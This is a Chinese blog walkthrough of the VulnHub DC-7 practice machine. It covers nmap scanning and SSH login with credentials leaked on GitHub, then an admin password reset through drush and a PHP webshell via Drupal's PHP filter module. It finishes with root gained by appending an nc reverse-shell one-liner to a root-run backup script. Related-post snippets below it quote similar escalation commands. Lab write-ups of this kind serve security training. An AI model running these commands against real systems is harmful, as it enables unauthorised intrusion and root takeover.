靶机练习 DC-7

最新推荐文章于 2025-01-02 20:54:52 发布
最新推荐文章于 2025-01-02 20:54:52 发布
阅读量320 收藏
点赞数 2
CC 4.0 BY-SA版权
分类专栏: vulnhub靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43705814/article/details/113062730

渗透测试靶机练习 DC-7

一、靶机介绍

与之前的靶机是一个系列可在该网站下载搭建
链接:https://www.vulnhub.com/

二、搭建环境

查看靶机能否正常运行
在这里插入图片描述
作者提示写在最前:
如果您需要求助于暴力破解或字典攻击,您可能不会成功,也就是说断绝了暴力破解的道路。
在这里插入图片描述
话不多说开始渗透

三、获取Flag

1.进行主机发现发现靶机的ip并对靶机端口进行详细扫描

nmap 192.168.1.0/24 
nmap -sS -sV -p- -A  -O 192.168.1.100

在这里插入图片描述开放了22与80端口
2.进入主页查看获取有用信息
CMS是Drupal查看是都有可利用漏洞
在这里插入图片描述
但是经过尝试之后没有成功只能尝试其他方法
在浏览网页时发现最下方有一串字符
在这里插入图片描述

通过搜索可以发现原作者将源代码发在了github上最终在config.php中找到了账号和密码
在这里插入图片描述

username = "dc7user"
password = "MdR3xOgB7#dW"

通过端口扫描发现开放了22端口尝试ssh进行远程连接

ssh dc7user@192.168.1.100

在这里插入图片描述
backups中的文件无法查看
在这里插入图片描述
查看mbox文件发现备份数据库文件路径
在这里插入图片描述
在这里插入图片描述通过查看文件发现可以使用drush命令,可以使用该命令进行密码的修改

// An highlighted block
var foo = 'bar';

提示需要进入到/var/www/html/目录下才能进行文件的修改

drush user-password admin --password="123"

在这里插入图片描述
登陆成功
在这里插入图片描述
我们需要安装一个插件因为不安全的插件都会被默认移除这里需要我们自己安装
链接https://www.drupal.org/project/php
在Extend目录下下载安装好的插件勾选php filter 然后下载 就可以使用了
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
返回主页点击在左边的Tools栏中点击Add content -> Basic page,在Body栏内写入一句话木马保存之后用蚁剑进行连接
在这里插入图片描述在这里插入图片描述
3.反弹shell,使用nc进行接收

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.108 1234 >/tmp/f

在这里插入图片描述

在这里插入图片描述4.提权:接下来通过将反弹shell写入backups.sh文件中获取root权限
首先进入到/opt/scripts目录下
然后执行语句获取权限

cd /opt/scripts
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.108 1235 >/tmp/f" >> backups.sh
cat backups.sh

在这里插入图片描述
因为执行需要脚本需要时间不着急等待一会儿
在这里插入图片描述成功获取flag
在这里插入图片描述

DC7靶机-Walkthrough
ins1ght的博客
09-23 2623
目前为止,做过的vlunhub里面的靶机里,这个算是比较开脑洞的了。首先发现网站首页footer部分多出的一个@DC7USER,这与一个未经DIY的Drupal站点的footer展示内容不同,进而通过Google搜索发现了放在Github上的系统登录口令,才有了后续的一系列操作。回忆起之前在某CTF大赛中打酱油的经历,那个时候也有一道Web题目,也是通过放在Github上的一个项目为突破口。历史真是TM惊人的相似……
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3807
前言 这次练习靶机是vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
DC7-靶机
Au
11-30 1745
下载地址 下面是作者的一些提示,和爆破无关,需要Google~~~ 配置的环境: kali:192.168.25.131 DC7-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.128,判定为DC7-靶机,继续使用nmap获取详细信息...
DC-7靶机
m0_62094846的博客
07-05 297
ifconfig查找主机IP扫一波内网,探测下存活主机nmap 192.168.61.0/24使用nmap工具对DC-5靶机扫描开放的端口nmap -A -T4 192.168.61.136 -p- -oN nmap136.Anmap -A -T4 192.168.61.136 -p- -oN nmap136.A有22和80端口下面有提示DC7USER百度一下可以下载一个文件这里也说明是重要点下载到kali本地git clone https://github.com/Dc7User/staffdbcd s
靶机DC-7
weixin_43940853的博客
12-09 371
kali : 192.168.230.233 靶机 : 192.168.230.235 扫了目录,查看了robots.txt,登陆框也看了一下注入,并没有发现啥,注意到下面的@DC7USER,google一下,发现了源码,拷贝下来 打开其中的config.php,发现了一个账号密码,ssh上去直接登录成功 先进入了一个目录,查看文件后发现都是乱码 把目标放在mbox上 关注到邮件的Subj...
vulnhub之DC7靶机
LainWith的博客
02-14 1549
目录介绍信息收集主机发现主机信息探测访问网站SSH登录信息收集修改web后台密码挂马提权 介绍 系列: DC(此系列共10台) 发布日期:2019年8月31日 难度:中级 Flag:获取root权限,并拿到唯一的flag 学习: drupal安装php实现挂马 提权 靶机地址:https://www.vulnhub.com/entry/dc-7,356/ 从靶场得到提示信息: 靶机更适用Virtualbox 不要尝试爆破,很难成功 信息收集 主机发现 netdiscover主机发现 对于VulnHu
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
DC系列之DC-6渗透测试
最新发布
qq_45392044的博客
01-02 1275
echo "os.execute('/bin/bash')" >> root.nse #将os.execute('/bin/bash')写入到root.nse文件中。除了本地需要修改hosts文件,那我们用kali虚拟机去访问目标80端口的时候,我们也需要去修改一下本机的host文件。在使用wpscan之前我们要做一个工具的更新: wpscan --update 更新工具。进入到mark 的家目录下,在stuff 目录下发现things-to-do.txt 文件。
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 2111
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习靶机是vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
渗透测试学习之靶机DC-7
xdbzdgx的博客
12-05 2736
1.下载靶机 本篇文章是DC靶机系列的第7篇,针对的是靶机DC-7,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-7的下载地址为DC: 7 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 DC-7只有一个flag。 在VMware加载成功之后并开启,建议把DC-7靶机的网络链接模式改为NAT模式。本文使用的攻击机为kali(安装在VMware上,IP为:192.168.88
靶机渗透之DC-7
2301_76227305的博客
06-26 677
不算太难的靶机,就是一开始可以搜出来源码可能很难想到。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
DC-7靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-07 970
前言 其他DC靶机攻略请查看我的其他文章。 一、DC-7的信息收集 DC-7靶机开启后,可以直接看到IP地址,我们直接nmap扫描查看一下目标开放的端口: 扫描后我们可以查看到目标开放了80与22端口,并且网站的框架采用了Drupal8(后面会有用) 访问80端口,进入网站后需要登陆 在github上DC-7给出了一个用户名与密码 可是并不能登陆 <?php $servername = "localhost"; $username = "dc7user"; $password = .
DC-7靶场
mlws1900的博客
03-27 1237
常规思路是用searchsploit找相关漏洞进行利用,看大佬wp发现查看漏洞发现不行,这个信息收集是在互联网上进行的,我们搜索下面这个作者的名字@DC7USER,可以看到如下内容。很多文章在这里就教用户去写小马了,但是需要在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析。同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell。我们进入主界面,点击content,点击basic page,写入小马。
DC7靶机
qq_40646572的博客
05-11 240
信息搜集 开启DC7靶机 先看下DC7靶机下载页面是否有提示。 靶机作者提示,暴力破解,不可能,除非字典🐂。 先使用nmap扫描一下,看下靶机开放的端口。 Nmap扫描发现80端口以及22端口处于开启状态。 发现是drupal8cms系统。 发现没什么可以利用的信息。发现版权声明处存在一处不太对劲的信息,正常来讲此处应该是@drupal才对。 百度下,发现好多dc7靶机挑战者,用到了这个信息。此处信息是用于git信息搜集。 Github上直接搜集DC7USER。搜索到dc7靶机作者的账号,发现
vulnhub:DC7靶机
qq_63283137的博客
09-15 329
1,常规的扫描ip、端口、目录2、目录没利用点3、借助外界源码,链接用户4、用户没权限、有可利用的文件5、修改admin账户,拿webshell6、反弹shell,提权。
Vulnhub靶机DC7
qq_48904485的博客
02-17 1058
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机DC7(10.0.2.60)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/dc/DC-7.zip。
vulnhub渗透测试靶机DC-7
weixin_46128614的博客
01-19 546
下载地址:https://www.vulnhub.com/entry/dc-7,356/ nmap -sT -sV -p- -T5 192.168.49.21 我们进到80端口,作者提示我们不是爆破和字典攻击,让我们跳出box 在左下角留了一个用户,应该是Twitter的,老外都爱用Twitter 果然 我们把github上的内容下载下来,查看到了一个配置文件给到了一个账号和密码 dc7u...
DC-1靶机渗透测试攻略及DC-2靶机简介
DC-1靶机是Vulnhub提供的众多靶机之一,专门设计用于学习和练习渗透测试技术。 DC-1靶机描述中提到的渗透测试,是指一种旨在评估计算机系统安全性的方法,通过尝试攻击系统来找到安全弱点。渗透测试人员(俗称“白...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值